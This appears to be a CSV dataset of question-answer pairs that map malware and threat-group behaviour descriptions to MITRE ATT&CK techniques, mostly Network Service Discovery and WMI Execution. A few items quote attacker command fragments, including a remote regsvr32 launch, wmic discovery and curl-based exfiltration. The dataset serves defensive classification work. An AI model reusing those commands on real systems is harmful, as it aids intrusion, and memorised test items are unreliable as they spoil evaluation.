+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can check for open ports on a computer by establishing a TCP connection.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea can use a network scanning module to identify ICS-related ports.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has conducted port scans on a host.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can conduct port scanning against targeted systems.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell has a module to use a port scanner on a system.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: China Chopper's server component can spider authentication portals.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can perform port scans from an infected host.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker scans for other machines to infect.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can perform port scans from an infected host.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HDoor scans to identify open ports on the victim.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard has the ability to scan ports on a compromised network.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has used masscan to look for kubelets in the internal Kubernetes network.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer uses a custom port scanner to map out a network.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can scan the network for open ports and vulnerable instances of RDP and SMB protocols.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can scan for open TCP ports on the target network.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can scan for open ports including TCP ports 135 and 1433.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP has the capability to scan for open ports on hosts in a connected network.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NBTscan can be used to scan IP networks.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can scan networks for open ports and listening services.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can initiate a port scan against a given IP address.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 can perform port scans from an infected host.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy has a built-in module for port scanning.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa can perform network reconnaissance using the Advanced Port Scanner tool.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can scan for systems that are vulnerable to the EternalBlue exploit.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec has a plugin that can perform ARP scanning as well as port scanning.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can scan the network interfaces of targeted systems.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can scan for open ports on a compromised machine.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp checks for availability of specific ports on servers.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XTunnel is capable of probing the network for open ports.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can perform port scanning of TCP and UDP ports.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can launch port scans.,"Tecnique: T1046 Network Service Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, WMI in scripts were used for remote execution and system surveys.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host (`wmiprvse.exe`) to execute a variety of encoded PowerShell scripts using the `DownloadString` method.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used `wmiexec.vbs` to run remote commands.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used WMIC to executed a remote XSL script.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors has used WMI to execute commands.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used WMI for the remote execution of files for lateral movement.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 used WMI to steal credentials and execute backdoors at a future time.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used WMI to deploy their tools on remote machines and to gather information about the Outlook process.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used wmic.exe to set environment variables.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used WMIC to execute remote commands.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used Impacket for lateral movement via WMI.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Deep Panda group is known to utilize WMI for lateral movement.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca used a VBA script to execute WMI.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized `WMI` to execute commands and move laterally on compromised Windows machines.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used WMI to automate the remote execution of PowerShell scripts.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used WMI to install malware on targeted systems.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8's malicious spearphishing payloads use WMI to launch malware and spawn `cmd.exe` execution. FIN8 has also used WMIC and the Impacket suite for lateral movement, as well as during and post compromise cleanup activities.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used WMI to execute scripts used for discovery.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used WMIC to execute commands on remote computers.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used WMI for execution.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used a tool to run `cmd /c wmic computersystem get domain` for discovery.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that leveraged WMI for execution and querying host information.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has executed PowerShell scripts via WMI.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has used WMIC.exe for lateral movement.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used WMI for execution.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used Impacket’s WMIexec module for remote code execution and VBScript to run WMI queries.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers system information via Windows Management Instrumentation (WMI).,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used WMI to query targeted systems for security products.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Threat Group-3390 tool can use WMI to execute a binary.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used WMI to execute scripts for post exploit document collection.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has leveraged WMIC including for execution and remote system discovery.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used WMI to collect information about target machines.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally. Wizard Spider has also used batch scripts to leverage WMIC to deploy ransomware.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT can use WMI to gather AV products installed on an infected host.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has used wmi queries to gather information from the system.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira will leverage COM objects accessed through WMI during execution to evade detection.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses WMIC to execute payloads.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon uses wmic.exe to delete shadow copies.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can utilize WMI to collect system information, create new processes, and run malicious PowerShell scripts on a compromised machine.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can execute a WMI query to gather information about the installed antivirus engine.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta has used WMI to execute files over the network.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can use `wmic.exe` to delete shadow copies on compromised networks.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A BlackEnergy 2 plug-in uses WMI to gather victim host details.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use WMI to move laterally.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use WMI to gather system information and to spawn processes for code injection.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can use `wmic` to gather information from a system.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use WMI to deliver a payload to a remote host.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can execute remote commands using Windows Management Instrumentation.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEATHRANSOM has the ability to use WMI to delete volume shadow copies.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can use WMI queries to obtain system information.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can use WMI to execute commands.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The DustySky dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS can use Windows Mangement Instrumentation (WMI) calls to execute operations.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used WMI to execute powershell.exe.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use WMI to deliver a payload to a remote host.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has used WMI to gather information about the system.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT uses WMI to query the Windows Registry.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIVEHANDS can use WMI to delete files on a target machine.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy leverages WMI to enumerate anti-virus on the victim.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can use WMI to open a Windows command shell on a remote machine.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HALFBAKED can use WMI queries to gather system information.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HELLOKITTY can use WMI to delete volume shadow copies.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can use WMI to create a new process on a remote machine via `C:\windows\system32\cmd.exe /c start C:\windows\system32\\regsvr32.exe /s /iC:\windows\.dll`.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has used WMI to execute binaries.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Impacket's wmiexec module can be used to execute commands through WMI.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOMPROGO is capable of running WMI queries.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar obtains a list of running processes through WMI querying.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can use WMI to execute commands.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can use WMI to log into remote machines for propagation.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.","Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can use `wmic.exe` as part of its effort to delete shadow copies.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia searches for anti-virus software and firewall products installed on the victim’s machine using WMI.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoleNet can perform WMI commands on the system.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito's installer uses WMI to search for antivirus display names.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can use WMI to delete Shadow Volumes.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya can use wmic to help propagate itself across a network.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has used wmic.exe for local discovery information.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer uses WMI to help propagate itself across a network.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE uses WMI to perform discovery techniques.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can use WMI queries to retrieve data from compromised hosts.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may use WMI when collecting information about a victim.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 has a number of modules that use WMI to execute tasks.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a PowerShell payload.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ProLock can use WMIC to execute scripts on targeted hosts.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has attempted to execute with WMIC.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can execute WMI queries to gather information.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA uses WMI to perform process monitoring.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can use WMI to monitor for and kill specific processes listed in its configuration file.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi executes received commands with wmic.exe (for WMI commands).,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin uses various WMI queries to check if the sample is running in a sandbox.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can use WMI for lateral movement.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST used the WMI query Select * From Win32_SystemDriver to retrieve a driver listing.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can use `WMI` queries to detect the presence of a virtual machine environment.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic can use WMI to execute PowerShell commands on a compromised machine.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage can use WMI for execution.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has used WMI to discover network connections and configurations. Sibot has also used the Win32_Process class to execute a malicious DLL.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can query the WMI class `Win32_ComputerSystem` to gather information.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish has used WMI calls for script execution and system profiling.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has used the WMI command-line (WMIC) utility to run tasks.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet used WMI with an explorer.exe token to execute on a remote share.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can use WMI for execution on a compromised host.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif droppers have used WMI classes to execute PowerShell commands.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can use wmic process call create in a scheduled task to launch plugins and for execution.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry utilizes wmic to delete shadow copies.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One variant of Zebrocy uses WMI queries to gather information.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.,"Tecnique: T1047 Windows Management Instrumentation, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has sent locally staged files with collected credentials to C2 servers using cURL.,"Tecnique: T1048 Exfiltration Over Alternative Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can directly download cloud user data such as OneDrive files.,"Tecnique: T1048 Exfiltration Over Alternative Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore uses the curl -s -L -o command to exfiltrate archived data to a URL.,"Tecnique: T1048 Exfiltration Over Alternative Protocol, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has exfiltrated its collected data from the infected machine to the C2, sometimes using the MIME protocol.","Tecnique: T1048 Exfiltration Over Alternative Protocol, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FrameworkPOS can use DNS tunneling for exfiltration of credit card data.,"Tecnique: T1048 Exfiltration Over Alternative Protocol, Tactic: TA0010 Exfiltration"
